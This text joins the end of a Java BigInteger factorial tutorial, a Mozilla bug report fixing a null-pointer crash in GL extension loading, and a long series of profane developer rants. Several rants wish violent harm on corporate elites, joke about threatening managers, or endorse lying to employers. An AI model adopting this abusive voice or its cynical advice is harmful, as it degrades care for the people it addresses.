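                    // 20! = 2432902008176640000 still fits in a long;
                    // from 21! onwards the value wraps around and becomes
                    // meaningless (often negative).
                    System.out.printf("%d! as long = %d%n", i, factorial);
                }
            }
        }
    }

Running it shows the wrap-around immediately, which is exactly the failure mode the BigInteger version above avoids.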
Important things about BigInteger class in JavaBigInteger class in Java is designed to deal with really large numbers in Java, but to do that it's very important that you make yourself familiar with the class. Here are some key points about java.math.BigInteger class : 1. The BigInteger class is used to represent arbitrarily large numbers. Overflow doesn't occur as is the case with int and long primitive. 2. The BigInteger class is immutable which means that the object on which the multiply function was invoked doesn't change the integer it is holding. The multiplication is performed and a new BigInteger is returned which needs to be stored in the variable fact. 3. BigInteger provides operations similar to int primitive type in Java, additionally, it provides support for the prime generation, bit manipulation, GCD calculations, etc. 4. You can create BigInteger object by giving number as String or byte array using constructor, or you can convert a long value to BigInteger using valueOf() method as shown below : BigInteger bigIntegerFromLong = BigInteger.valueOf(292909333L); BigInteger bigIntegerFromString = new BigInteger("338948938948"); Remember BigInteger can help you to deal with really large numbers in Java. That's all about how to calculate the factorial of a large number in Java. Clearly, after some point long is not enough to result of the factorial and you need something bigger than long but not double, BigInteger is the class to represent large integral values. In theory, BigInteger has no limit and it can represent any integral value till infinity. If you are looking for some handy Java programming exercise then don't forget to check out the following posts and some good books : - Top 15 Data Structure and Algorithm Interview Questions (see here) - 10 Free Data Structure and Algorithms courses (free courses) - How to print all permutations of a String in Java? (solution) - How to write FizzBuzz in Java 8? (answer) - Top 20 String coding interview questions (see here) - How to find the first non-repeated character from String? (solution) - 133 core Java interview questions of last 5 years (see here) - Top 30 Array Coding Interview Questions with Answers (see here) - How to reverse an array in place in Java? (answer) - Top 30 linked list coding interview questions (see here) - How to reverse Integer in Java? (solution) - Top 50 Java Programs from Coding Interviews (see here) - Top 5 books on Programming/Coding Interviews (list) - How to check if the given String is Palindrome in Java? (solution) - My Favorite Coding interview courses for Beginners (courses) - 100+ Data Structure and Algorithms Questions for Interviews (questions) - How to swap two integers without using a temporary variable in Java? (solution) Thanks for reading this article so far. If you like this article then please share it with your friends and colleagues. If you have any questions or doubt then please let us know and I'll try to find an answer for you. P. S. - If you are new to Java and looking for free online courses to learn Java from scratch then you can also check out this list of free Udemy courses to learn Java. It contains 5 free Java courses from Udemy and Coursera to teach you Java from scratch. 5 comments : There is a error in the code...In the for loop, the condition should be i>0 there's a typo in for-llop, it should be: i > 0 Hello @Ansdeep and @Annonymous, yes that was a typo, corrected now. Thanks for pointing it. what plugin are you using to format your code in your blog? 
As far as I know there is no built-in mechanism in Google's Blogger to format code. @Neha, I use online syntax highlighters and then use the HTML directly in Blogger.
https://javarevisited.blogspot.com/2015/08/how-to-calculate-large-factorials-using-BigInteger-Java-Example.html
CC-MAIN-2022-40
en
refinedweb
Closed Bug 728656 Opened 11 years ago Closed 11 years ago Crash @mozilla::gl::GLContext::Init Extensions Categories (Core :: Graphics, defect) Tracking () mozilla13 People (Reporter: glandium, Assigned: glandium) Details (Keywords: crash, Whiteboard: [qa!:esr10]) Crash Data Attachments (1 file, 1 obsolete file) I got a couple reports in Debian with the following stack trace: #0 __strlen_sse2 () at ../sysdeps/x86_64/multiarch/../strlen.S:31 #1 0x00007ffff73c5876 in *__GI___strdup (s=0x0) at strdup.c:42 #2 0x00007ffff5748e96 in mozilla::gl::GLContext::InitExtensions (this=0x7fffc90f7800) at /tmp/buildd/iceweasel-9.0.1/gfx/thebes/GLContext.cpp:448 #3 0x00007ffff574a507 in mozilla::gl::GLContext::InitWithPrefix (this=0x7fffc90f7800, prefix=<value optimized out>, trygl=<value optimized out>) at /tmp/buildd/iceweasel-9.0.1/gfx/thebes/GLContext.cpp:374 #4 0x00007ffff5757d72 in mozilla::gl::GLContextGLX::Init (format=<value optimized out>, display=0x7ffff6d96000, drawable=<value optimized out>, cfg=<value optimized out>, vinfo=<value optimized out>, shareContext=0x7fffcaab0800, deleteDrawable=<value optimized out>, pixmap=0x7fffcb5b6d80) at /tmp/buildd/iceweasel-9.0.1/gfx/thebes/GLContextProviderGLX.cpp:730 The code looks like this (in that particular version): 443 void 444 GLContext::InitExtensions() 445 { 446 MakeCurrent(); 447 const GLubyte *extensions = fGetString(LOCAL_GL_EXTENSIONS); 448 char *exts = strdup((char *)extensions); The problem is that fGetString(LOCAL_GL_EXTENSIONS) returns NULL, and strdup crashes when given a NULL argument. Assignee: nobody → mh+mozilla status-firefox-esr10: --- → affected status-firefox10: --- → affected status-firefox11: --- → affected status-firefox12: --- → affected status-firefox13: --- → affected Comment on attachment 598640 [details] [diff] [review] Avoid crashing when there are no GL extensions reported by the GL implementation Review of attachment 598640 [details] [diff] [review]: ----------------------------------------------------------------- r=me with this caveat: ::: dom/base/nsGlobalWindowCommands.cpp @@ +66,5 @@ > #include "nsIClipboardDragDropHookList.h" > > using namespace mozilla; > > +static const char sSelectAllString[] = "cmd_selectAll"; That unrelated hunk should be handled separately. Attachment #598640 - Flags: review?(bjacob) → review+ (In reply to Benoit Jacob [:bjacob] from comment #2) > > +static const char sSelectAllString[] = "cmd_selectAll"; > > That unrelated hunk should be handled separately. That wasn't meant to be there. Refreshed to only contain the relevant part Status: NEW → RESOLVED Closed: 11 years ago Resolution: --- → FIXED Target Milestone: --- → mozilla13 Comment on attachment 598777 [details] [diff] [review] Avoid crashing when there are no GL extensions reported by the GL implementation [Approval Request Comment] User impact if declined: Firefox may crash when the system GL libraries provide no extensions Risk to taking this patch (and alternatives if risky): It's a simple NULL check. No risk. String changes made by this patch: None Attachment #598777 - Flags: approval-mozilla-beta? Attachment #598777 - Flags: approval-mozilla-aurora? Comment on attachment 598777 [details] [diff] [review] Avoid crashing when there are no GL extensions reported by the GL implementation [Triage Comment] please land this today if possible (02/27/12) for tomorrow's go-to-build on beta5 and also land on mozilla-esr10 branch before Thursday March 1, 2012 in preparation for March 2 go-to-build on esr. 
See for details Attachment #598777 - Flags: approval-mozilla-esr10+ Attachment #598777 - Flags: approval-mozilla-beta? Attachment #598777 - Flags: approval-mozilla-beta+ Attachment #598777 - Flags: approval-mozilla-aurora? Attachment #598777 - Flags: approval-mozilla-aurora+ Mozilla/5.0 (Windows NT 6.1; rv:10.0.3) Gecko/20100101 Firefox/10.0.3 No new crash reports having the signature: [@ strlen | je_strdup | mozilla::gl::GLContext::InitExtensions()] appear in Socorro after the patch landed. Marking this as Verified on Firefox 10.0.3 ESR. Whiteboard: [qa!:esr10]
https://bugzilla.mozilla.org/show_bug.cgi?id=728656
CC-MAIN-2022-40
en
refinedweb
Search - "bullshit" - - - I fucking hate toxic positivity. Every fucking corporation pushes the notion that "lifE iS aWeSomE, wE cArE abOuT pEoPle" and other such bullshit, and when you point it out, they call you a bad, toxic person. No, you don't care about your community, let alone the whole world. You're just trying to make people believe that spyware, wage slavery and being fired by a neural network is the norm. You're making money off of those who don't have a choice. If you account all people, not just American white rich 1%, it turns out that for the vast majority of people life is either an uphill battle or straight up nightmare. People are working in shifts and have no time or emotional resource to spend on themselves. Most of the people can't afford a house or a flat. Even those who can still suffer from mental illnesses, to the point where there are more mentally challenged people than mentally healthy ones. The word "neurotypical" meaning "mentally healthy" is wrong. You want nothing but to sell your stuff and earn more money off of Chinese and Indian factory workers who work 16-hour shifts. Maybe your life is great, but aggressively pushing this notion is a big, wet spit in the face of humanity. Fuck you. Fuck your space rockets. Fuck your twitter accounts. Fuck your institutionalized exploitation of the weak. Fuck your products. Fuck your "open source". Fuck your "GDPR compliance". Fuck your offshores, your hedge funds and your tax evasion. Fuck your bailouts. Fuck your ships spilling tons of crude oil, fuck your factories, fuck your slave labor, fuck your anti-suicide nets in Chinese dormitories. One day, because of you, our planet will become unlivable. You will hop into your fancy space rocket to go to that top-1% elite Mars colony. Nice job. But I will pray for a solar flare to hit you and turn you and your fucking rocket into radioactive ash.22 - Fuck corporate bullshit. I do the job, you pay me, the rest is pointless crap. You are not my family, I don't base my whole self worth on working for you and mostly I really don't care. I'm really not cut out for this shit.9 - i was asked to start a new project, and another dev was brought onto the team shortly after. as soon as he joined, straight away he started an entirely new project and worked on it through the whole weekend, then came back on monday and just sort of pasted his files into/over the code i had already started and was working on, with no regard for folder structure or naming conventions or anything. his work was even split between 2 almost identically named namespaces (both of which were completely different to the existing project namespace) and his shit broke everything i did in the first place. the cherry on top is that none of his work was even functional, it was purely dummy/mockup web pages that weren't linked to any sort of backend. when i asked him wtf he thought he was doing, he kept saying "i didnt touch your code" and refused to acknowledge that pasting a project over a different project can break stuff, then said it "wasn't his fault that i'm slow and not keeping up". and just kept saying vague bullshit about how i have to do it his way because he "has more experience" he had no idea what my previous experience was, he had never asked and i had never told him, he just decided that he had more experience than me.
i dug through the shit and found out that he didn't just break my work, he had actually purposely deleted it when he realised it was getting in the way of his spaghetti. i showed him the commit and confronted him with it and all the cunt said was "well the good news is, you know the fix" and kept trying to dismiss me in the most disrespectful ways he could think of. i eventually snapped at him (long overdue at this point) and told him that any experienced developer would not commit code that didn't even fucking compile, especially when they're the one who broke it, and that he needs to grow up. of course he then complained that i was being unprofessional. our manager decided we should go with fuckfaces """code""" without even looking at the work either of us had done, purely because fuckface is older than me and that's how the world works. in the end i just told my manager that i refuse to work with the guy and he could either take him or me off the project (guess who he picked) or i quit. after a few months of the guy failing to deliver any of even the basic functionality that was asked for, the entire project got scrapped, and the dude just quit once everyone realised he was literally just larping as an experienced dev but couldn't accomplish simple tasks. i never received an apology from anybody involved.5 - - FUCK WEB3, FUCK CRYPTO, FUCK NFTS, FUCK ALL THIS PONZI ASS BIG BULLSHIT!!!!!!!!!!! FUCK YOU WHOEVER MADE THJS!!!! THE ONLY ONES WHO PROFIT ARE NOT THE ONES WHO BUY CRYPTO OR JPEGS BUT THE ONES ON TOP OF THIS PYRAMID WHO CREATED IT!!!!! MIGHT AS WELL CODE MY OWN PYRAMID COIN/JPEG AND SELL IT TO SUCKERS!!!!!!!! FCKK YOU!!!!!!!!!!!!11 - I don't argue with managers. I believe the music is the universal language of the world, so I just sing! twinkle twinkle little star *pulls out glock* your bullshit has gone too far.5 - Its so weird working in this company. No onboarding, no micromanaging, noone to track your progress or performance. U can basically do what u want and ask what u want and requests will be fulfilled. Initially was assigned to a random team and started fixing stuff. I hated the scope so after 2 months in requested to switch teams, request approved. 3 months in realized I lowballed myself during the interview and actually am doing better than half of the team, so I asked for a 43% bump, request approved. 4 months in I realized that I did atleast 100hrs overtime in a month during crunchtime, burned out. Asked for a paid week off to recover, request approved. 5 months in realized that we have many MR's piling up in the team and I could help with approving some of them, but they grant MR approval rights only when u work here for a year or are a decent dev from the get go. Requested for MR approval rights, request approved. Again it feels so weird working on a big product with 6-7 scrum teams. Its like there is no bullshit, just ask what you need you will get what you asked so you can continue working. On the other hand its kinda weird to keep asking everything, in other companies a good teamlead/manager shows more initiative takes care of stuff like this without even asking.8 - - sooo shit started hitting the fan after another useless discussion where PM tried to hardcore micromanage me and then bullshit his way out, i fucking tilted and started swearing. after this discussion, he invited to a meeting next week to talk about "miscommunication". 
no need bruh, i'll tell my boss on Monday i want to switch to another team.8 -.16 - - sprint retros with PM are a fucking farce, it cannot possibly get any more grotesque. they are held like this: - in the meeting, PM asks each team member directly what they found good and bad - only half of the team gives real negative feedback directed towards the PM or the process, because they are intimidated or just not that confrontative - when they state a bad point, he explains them that their opinion is just wrong or they just need to learn more about the scrum process, in any case he didn't do anything wrong and he is always right - when people stand up against this behavior, he bullshits his way out, e.g. using platitudes like "it's a learning process for the whole team", switching the topic, or solely repeating what he had just said, acting like everybody agreed on this topic, and then continue talking - he writes down everything invisible for the team - after the meeting he mostly remembers sending a mail to the team which "summarizes" the retro. it contains funny points like "good: living the agile approach" (something he must have obviously hallucinated during the meeting) - for each bad point from team members, he adds a long explanation why this is wrong and he is doing everything right and it's the team's fault - after that happens the second part of the retro, where colleagues from the team start arguing with him via mail that they don't feel understood or strongly disagree with his summary. of course he can parry all their criticism again, with his perfectly valid arguments, causing even longer debates - repeated criticism of colleagues about poor retro quality and that we might want to use a retro tool, are also parried by him using arguments such as "obviously you still have to learn a lot about the scrum process, the agile manifesto states 'individuals and interactions over processes and tools', so using a tool won't improve our sprint retros" and "having anonymous feedback violates the principles of scrum" - when people continue arguing with him, he writes them privately that they are not allowed to criticize or confront him. i must say, there is one thing that i really like about PM's retro approach: you get an excellent papertrail about our poor retro quality and how PM tries to enforce his idiocratic PM dictatorship on the team with his manipulative bullshit. independently from each other, me and my colleague decided to send this papertrail to our boss, and he is veeeery interested. so shit is hitting the fan, and the fan accelerates. stay tuned シ16 - Everyone that says you can't get viruses in Linux because only .exe compiled programs can contain malicious code or some bullshit like this is a fucking retarded Sorry I had to say it12 - - You know what really grinds my gears? When a manager writes up some bullshit "this doesn't work". Then you waste your time following up, and they say, "oh yeah, this so and so pop up came up with validation error X". YEAH? AND I'M SUPPOSED TO KNOW THAT WHEN YOU WRITE ABSOLUTELY NO STEPS TO REPRODUCE, JUST COMING TO ME WITH "HEY, X IS BROKEN" GOD JUST GET FUCKING 1% TECHNICALLY LITERATE THATS ALL I ASK FOR I'M SO SICK OF YOUR SHIT2 - Not a coworker, but this guy who I went to uni with and was a real life saver when I was really down. (we played minecraft together) ... So, he is a real genius. One of those guys who I legit couldn't keep up with. 
His brain works, he doesn't bullshit his way through, he's not pretentious, he is legit a down to earth rare genius. Yet, he doesn't use his talents enough, he likes to work or go home to play minecraft. And he doesn't politically care enough, so I am almost sure that he will end up getting stuck in the defence force. We're still friends. And I try my hardest to not be nosy and nag at him that he can do better. I mean, he is happy the way he is, and he is not ambitious. But the memory of him is a reminder that not everyone who gets somewhere is the best and brightest.41 - - - Manager: Can you stay late as fuck today? One of our bitchiest vendors is gonna update their piece of crap and I'm pretty damn sure shit is gonna hit the fan Dev (inner voice): no fucking way, I have kids to watch and chores to do! Dev (outer voice): can't we just check everything in the morning? Manager: No fucking way! If there is some fucking "challenge" when our "people" try to log onto their shit, I'm gonna look like a chump! Let's talk silvers, I will sign on that bloody commie bullshit for your hours tonight. Dev (outer voice): Fine. Until how late? Dev (inner voice): Wait, I was supposed to do it without getting overtime bonus?6 - I get really defiant when i repeatedly get micromanaged with bullshit instructions, such as asking me to have my just started c++ library poc which also involves a lot of learning and will earliest be usable in a few months, "ready for our customer devs" in 2 weeks from now. just no, you fucking retard. also, the lib alone wouldn't make any sense, since the code parts working with it don't yet exist at all. and then getting instructed to ask customers if they can provide you with c++ code that solves the task for them in their own software, which of course will somehow magically fit in my existing codebase. even if it existed (which it fortunately doesn't because they do everything in C#), i don't think i'm going to be faster trying to somehow solder in their code into my library, of which i'm still brainstorming about the general architecture. if you have so fucking unrealistic expectations, maybe stop sniffing glue all day and don't make this my fucking problem - I'm gonna fail my now-online uni course. I'm not understanding jackshit. Fuck this covid bullshit. Thank you for listening.17 - so i had the "miscommunication" meeting with PM today. he criticized me for "not following his orders", allegedly having worked on stuff during this sprint that did not help fulfill his sprint goal, and that i should have aligned my work with him. i didn't even realize this exact goal existed specifically for my user story (even though it was at least mentioned with one single word in story description, must have read over it). however, during the whole fucking sprint, he never mentioned a single time i should align with him. every daily i'm explaining what i'm going to do, every day he sees subtasks that i created for this story, and he never disagreed or mentioned this topic, so i assumed i'm on track. and now suddenly, when sprint is over, he blames me for the misalignment? he also criticized me for having said something rude to him during a team meeting, but he couldn't rephrase or specify what i had said, he couldn't give any details at all, and also i couldn't understand or remember what he meant. 
what shall i respond to that?🤷♀️ also, aligning my work with that of a colleague and brainstorming with him about how our API could look like for our stakeholders was "not on track / following his orders" for him, even though i had announced it in the daily and he hadn't disagreed. either this guy has alzheimer's or he has a down on me, dunno what to make out of all that. and then he mentions i appear "somewhat aggressive" to him. hmm weird, why should someone become aggressive when they have to deal with this bullshit all the time 🤦♀️12 - - I'm pretty sure that the technical tests for FAANG are just to prove that you'll bust your ass doing trivial bullshit for them / and that you're a sucker -- instead of actual meaningful skill checks. Is this guy a total sucker who will drink our Koolaid when it's time? Are they wearing Nike? Yes. This is going to be a good investment. I was down and out once and got a job a Micheal's Art and Crafts store. The application was clearly a mindfuck test. It asked, "If your boss was stealing - would you report them?" BTW - the answer is "No." You only report people below you. I answered in the way I knew the computer wanted me to - and I got the job. Same shit. Are you subordinate? You're hired.2 - - That slow realization that you're hitting burnout due to the toxicity of those in non-technical roles above you is wild. Also, Jira, Scrum, Sprints and all the extra bullshit can fuck right off as well.3 - - - dear female devs / haecksen, how many other female devs do you have in your team? if not so many, how do you feel about it? and do you get a lot of sexist bullshit or not so much? would be great to hear your experiences. the female quota among our devs is < 3% 😅 most of the time i don't think about it and just do my job and it's fine, but sometimes i think, it's a bit weird. also, there is this fear that people might not have trust in my skills. it can be good and bad to be "special"... anyway, having more female rolemodels / mentors / colleagues to have technical discussions with would be awesome.59 - Dear customer, disregarding the bullshit your agency has dumped into Figma, I hereby deliver a clean, minimalist, and usable website without carousel sliders, chatbots, call-to-action teasers for newsletter signup, and muted auto-play videos consuming your end users' bandwidth. One day you will understand and be grateful, too!3 - - Yeah well fuck right off then. I'm just going to build a bot to auto signup for every possible username combination left in the latin alphabet. Then after the media bullshit dies down they'll be changing this policy. 👺23 - - Doing e-learning for a job One of the examples provided: "You could be late for work (fail to meet your objective of being on time) because you're hit by a car whilst crossing the road" Are you fucking kidding me, I think being late to work would be the least of my worries. Fuck corporate bullshit.18 - - I am a person who never lies. And when I see/hear others lie, be it for the benefit of mine or not, it gets my blood boiling. I disrespect liers with passion. And I particularly hate magic fixes at work. You know the ones, when smth is not working for a few weeks, you involve 3 other teams responsible for their tiers, and then one day suddenly everything starts working. When you ask all the 3 tiers what has been done - everyone says "nothing". 
If you do this bullshit to me, just know that everytime I remember you, before remembering your name/face/role I very vividly visualize pissing on your toothbrush right before you wake up. Or did I do that for real..? Idk, it's too vivid to distinguish2 - God damnit Quora! I stumbled upon some article or post or whatever they are called on quora. And I really wanted to read the comments on it. It wouldn’t let me unless I log in. I normally don’t do that but I thought I’ll make an exception because I really wanted to read the comments. So I clicked on that comments button and logged in (via google). First it presented me some modal dialog to pick 5 things that interest me. And it was mandatory. Fine… I picked those 5 things. Finally it presents me the list of articles or whatever. But not the same list that I have seen before I was logged in. Scrolling, the article of my interest is not there. God damnit! Just show me my comments for fucks sake. I go back to that tab where I was not logged in to somehow copy the link of that article or the link to the comments section. But it doesn’t let me. Some bullshit pseudo smart layer of crap is preventing me from doing anything. Then I abuse the fucking share link to visit it in my logged in tab to finally see the comments that I came for. And the comments weren’t even worth it. God! What a waste of time! And how can one fuck up a fucking forum so much? It will be a lesson for me not to visit Quora ever again.4 - - The MS Teams SDK is bullshit. It's so half baked and comes with instructions like "you'll probably want a better implementation for production, good luck cause you'll have to write it yourself." Oh and don't forget to cache your installations in a file called "notifications.json" Deploying will create 2 app registrations (OIDC) and about 6 resources in Azure... But "you'll probably want to log to app insights in production"... So I hope you're very familiar with Bicep cause you'll have to figure out how to add that to your template properly and there are about 7 Bicep files to decipher and it doesn't create an app insights out of the box. Probably written by an intern.2 - Fuck you ios,storyboad,xibs,xcode. FUCK OFF!! YOU FUCKING ASSHOLES. Literally giving me migrane with your fucking ass constraints!! Fuck you xcode for not having a terminal. Ios is utterly bullshit. Has fucking all kind of devices that I have to set constraint. Fuck you macos. You are slower than a snail. How on earth do you take so much time to build!! Width, height, constraints, my ass! What is this fucking logic bro. Fuck you apple for making so many device of different sizes and then hiring us to set constraints. Warning warning warning oh what a load of crap! I would rather die than set your fucking ass constraints.6 - Central team: No, your team must be doing something wrong. Our pipeline is super-configurable and works for any situation! You just have to read the docs! Me: Where are the docs? Central team: Uhh, well, umm... we'll hook you up with a CI/CD coach! Me: Okay, cool. In the mean time, can you point me at the repo where all the base scripts are? Central team: Sure, it's here. Me, some weeks later: Yeah, uhh, the coach can't seem to figure out how to make our Prod deployment work either. Central team: That's impossible! It's so easy and completely configurable! Me: Well, okay... but, here's the thing: your pipeline IS pretty "configurable", in the sense that you look for A LOT of variables... Central team: See! We told you! 
Me: ...none of which are actually documented, so they're just about useless to me... Central team: But, but the coach... Me: ...couldn't make heads or taisl of it either despite him literally being ON YOUR TEAM... Central team: Then your project must just be architected wrong! Me: Well, we're not perfect, so could be... Central team: Right! Me: ...but I think it's far more likely that the scripts... you know, the ACTUAL Python scripts the pipeline executes... while it took me DAYS to get through all your levels of abstraction and indirection and, well, BULLSHIT... it turns out they are incredibly NOT flexible. They do one thing, all the time, basically disregarding any flexibility in the pipeline. So, yeah, I'm thinking this is probably one of this "it's you, not me" deals. Central team: Waaaaahhhhhhhh!!!!! - “You know what is not fungible, scarce and valuable to me? My time! So if you wish to persuade me NFT are a good thing, you should pay me a fair amount of real money to make me listen your bullshit” From now on this will be my standard reply to NFT harassment. Feel free to use, edit and share with others.5 - - Hiring a third party to help us with something... Third party: yeah okay, we know what we need. Can we get access to your git repo Me: sure, I'll make sure you'll get it (To the admins): hey can you get them access to our git server? Admins: did they sign the personal data processing contract? Me: oh they won't work with any personal data. It's a dev server and they only need access to the source code. And the usual contracts and NDAs are already done Admins: well we still need the other one. ... Sure. Why not. Just delays the start of the process for... Like a week and a half until that useless bit of paper has passed through all the necessary departments. Not like time's an issue. Right - So my google assistant keeps bugging, my amazon app keeps glitching, my mac's display config get shuffled every time the computer wakes... And we're supposed to do 10 rounds of bullshit whiteboarding interviews to work with these morons?1 - I’ve never seen a rich person give a step by step guide that led them to where they are, it’s always some beat around the bush bullshit20 - i don't have the energy to argue against this bullshit any longer when you're trying so hard to build a piece of crap that nobody needs, fine - Headhunter called about a rejection for an assignment I did: Assignment had malformed data examples Assignment had unrealistic timespan for completion Assignment used item stocks for a shop setup Assignment didn't use any prices just item stocks Who builds a webshop without prices in the first place? So done with this job hunting assessment bullshit - [CMS Of Doom™] Ah, yes, their built-in bullshit newsletter module just sent the n-th user n emails. Wonderful considering n=368. The culprit? Better don't ask... OK, anyway: So the mailer is running as a CRONjob, but nah, not as a console script call but by a public HTTP GET URL call, fucking obviously (it's the CMS Of Doom for a reason). So these fucking imbeciles "implemented" an ob_start() callback where HTML links are - for whatever fucking reason - modified by some regex (obviously everybody knows parsing HTML by Regex is trivial). In this case the link was somehow modified to recall the mailer Cronjob... This must have upset the pngoing mailing process thus spamming mails. Whyyyy And I've thought I've seen it all after 6 months in this legacy hell... 
This is why you don't run a company consisting of only beginners in PHP (in cluding their "CEO")! - - You know when you work with an incompetent team or organization? No one knows what they are doing and there is no competent leadership to set high standards and people are making their own bullshit up? Yeah? That's my current workplace.3 - The overuse of something is designed to demoralize and discourage the very thing. Vapid christmas jingles, meaningless consumerism, blackfriday shopping, keeping up with the joneses, decorations and tinsel bullshit so overloaded on homes and trees that it looks like a gaudy airstrip display, holiday-town-esque themes and festivals so frequent, overcooked and overcommercialized that its like you've stepped into a 40-year-old sterile suburban house-wives braindrain internal fantasy reruns of regurgitated hallmark christmas romance movies. Alls fair love and christmas. In other news, some strapping young and intrepid adventurer *lit a public christmas tree on fire*. Its a shame really, when we can't just enjoy the simple things without some dickhead going and spoiling it. But also I can't help but ask "ARE YOU NOT ENTERTAINED?!"13 - - Woke up, worked out, went back to bed. (?? Yeah I'm surprised too) Slept for an hour, woke up again, worked tirelessly and finished the slides. (Not as easy as you think. Had to drag out and undust a few jupyter notebooks again, plus realized that the stupid past me has deleted a bunch of notebooks because of lack of space, and I had to remake one again.) Now I have to figure out why google slides doesn't like to play my videos, and write my script (don't give me the "don't practice too much" bullshit or "don't need a script". That's for losers. You gotta practice enough that you can cite your presentation even if you got a concussion in the middle of the presentation. Plus, you can modify content in the middle of presentation based on the crowd vibe but you can't do that without knowing your script by heart, can you?) Aaaaaand what was I saying... I forgot... Geez ... Well, wish me luck. This week is gonna be tough. And next week. And probably the week after. Ew.6 - - Brothers and sisters I have ascended From my early chilidhood I was taught by my parents & society that I should put effort into doing things that I "MUST", be kind and polite to others Tis' all bullshit; never lift a finger if you do not feel like it; never help people free of charge; if you dislike a particular undertaking then it is not worth even an ounce of effort. We live in a society.12 - Previous department director. I loved working with the dude. He had a no bullshit attitude and would always back up and defend his people, he would tell us that whenever he sticks his neck out for us we better be in the right because he would go full ballistic and did not wanted to make a fool of himself or the department. Dude was fucking amazing. He was happy when I accepted the promotion but told me that he wanted me to shadow him to learn more about proper management techniques. It was a clear mentor trainee relationship, but he had 100% full trust in my ability and knowledge. He retired about a year ago, got a new director, dude ain't thaaaat bad but he has a lot of cons, as a person I like the new boss, as a boss I am not convinced entirely since he has not been around for long, but it does feel that he does not listen, goes in one ear and out through the other kind of person. 
- - Working on another SaaS product, and now I've run into a "fun" conundrum that is hard to determine cleanly in an automated fashion. I'm certain it's stupid bullshit opinionated conventions like this as to why so many devs are driven to burnout and bitterness...3 - "Hey can you make this excel report for me real quick? Here are the columns, you gotta get them from this table in the database. Shouldn't take long." Alright, sounds easy enough wait where is the data. I have to join how many tables? What is this bullshit data? I want to strangle the guy who modeled this piece of garbage.5 - - So with the advent of Docker Desktop going premium we thought we'd buy a couple licenses... What did the HR team say? "No, you're fine - we can just keep using it - how will they know?" WHAT??!!! I will NOT be the one who gets brought into a multi-million dollar lawsuit because HR are a bunch of nitwits. I will fight this with everything I have so that when ouch time comes, i can say i didnt participate in the shady bullshit these people are recommending.17 - - I think I've reached some kind of job nirvana. My coworkers and I all complain about our work. We're overworked, underappreciated, underpaid, and and have to deal with all sorts of bullshit all the time. Pretty much everyone who has been on the team longer than a year is talking about quitting. But I started at this company as a level 1 tech support phone technician before I transferred into the DevOps side of things, and that tech support job was SO much worse. Way more stressful, way less pay, mandatory overtime, horrible scheduling, being forced to remain calm while people hurl insults at you over the phone, and it was a dead-end job with a high turnover rate and almost no opportunities for advancement of any kind. And every time I think back on that job, I realize that what I have now is actually pretty great. I'm paid well (still underpaid for the job I do, but catching up really fast due to my current boss giving me several big raises to keep me from quitting lol). I deal only with other tech people like developers and data scientists so no more listening to salesmen insult me on the phone. I'm not in any sort of customer service role so I can call people on their bullshit as long as I'm professional about it. I'm salaried so they can't make me work horrible shifts. 99% of my days are a normal 9-5 workday. I actually have a reliable schedule to plan around. People treat me like the adult that I am. I'd get a similar experience at other, better-paying companies, for sure, but what I have now is still pretty great. I'm sure I'll be back in a few days to rant about more nonsensical bullshit and stress, but for now I'm feeling the zen. -22 - Imagine seeing words like developer:ess, member:esses or user:ess in artices on the web becoming more and more popular. Pretty dumb, yes? That’s what happening right now with the German language with something called gender-language. It hurts my eyes reading Entwickler:innen, Mitglieder:innen and Benutzer:innen. People argue that words like Entwickler are excluding woman by using the male form by default. But it’s just a matter of perspective. Why not just define this as the neutral form just like in english? Developer is neither male nor female. Everybody is fine with that. Yet the Germans are messing around with this gender shit and making text unreadable for no reason at all. It’s just bullshit!21 - .. - Well here it goes, I started out in customer support (A lot of stuff to tell here). 1. 
One of my colleagues would come to work drunk, like every day he would smell of boze (the hard stuff 80%+). When a customer got on his nerves he endet the call and threw his Keyboard across the room. He worked in the company 3+ Years after I left. 2. Another colleague would connect to his Personal Computer at his home and play WoW while at work ( Allthough the man was a genius with a lot of free time, until a new task was assigned to him) 3. My Boss at the time did some really shitty things. I worked 17 hour days (while I was 18) for a week, and at the end of the week he shredded the accrued overtime with some Bullshit Explanation. (I did not stay long after this shitshow happened). 4. A dispatcher who sent our technicians out scheduled their tasks so that they were on the road for weeks and did not see their families. This led to a very strong turnover among technicians. And yes, this company still operates today.1 - How to manage when you start something good for you, start taking decisions for your good and people start spreading hate about you. It obviously will effects your mental health right? How you guys manage it? I mean how? Today I'm feeling of getting bullied and getting bullied again from the same person. I'm correct but can't show the correctness just because there's no proof I've in-hand. I'm literally tired of people now - Just keep getting the dumbest tickets from a client as a Frontend dev. I told them I am a backend and even my contract says backend but I made the mistake to help them with some themes. So fucking ready to take other interviews where I don't have to deal with bullshit colors and fonts anymore.2 - - Worst was getting head hunted into my current role at this terrific company. Three months later I’m done with it. It’s not shit shitty codebase, or the lack of direction that self governing teams have. It’s not the megalomaniac company owner. It’s the bullshit team mobbing and 8 hours of video calls a day. The best part. Come he’ll or high water I’m getting myself out before the end of the year. I’d rather be busy and have f’k all chance of promotion than any more of this. At least the day will fly by. Just hope I don’t make the same mistake twice, that’s become my biggest worry now. - - When the team lead has no idea what the problem is but took too many public speaking courses so he’s really well-versed at feeding people bullshit…1 - 🍻 - Retarded WSL crashed which means I lost all my fucking logs How do people even work on this retarded OS? Is it just a scam for parasites to pretend they work and leeche on society using their precious little intellectual property bullshit12 - - - Reminder: if you were tasked with breaking down a work item/story, and your breakdown involved so much incorrect, outdated, and downright incomprehensible gibberish that, when you were approached by another dev, you had to rewrite the whole thing -- after rewriting it into a form that includes almost none of the original and still contains errors and omissions, you do not get to announce to everyone that you were 'helping' said dev to 'understand'. If you do this you are not some machevellian linguistic genius, you are just an asshole who is going to get found out for your bullshit sooner or later.7 - Play Store's $25 registration fee - for getting PWA listed in their shitty catalogue? Who in the right mind would even jump in this clusterfuck of store to find a *web* app? 
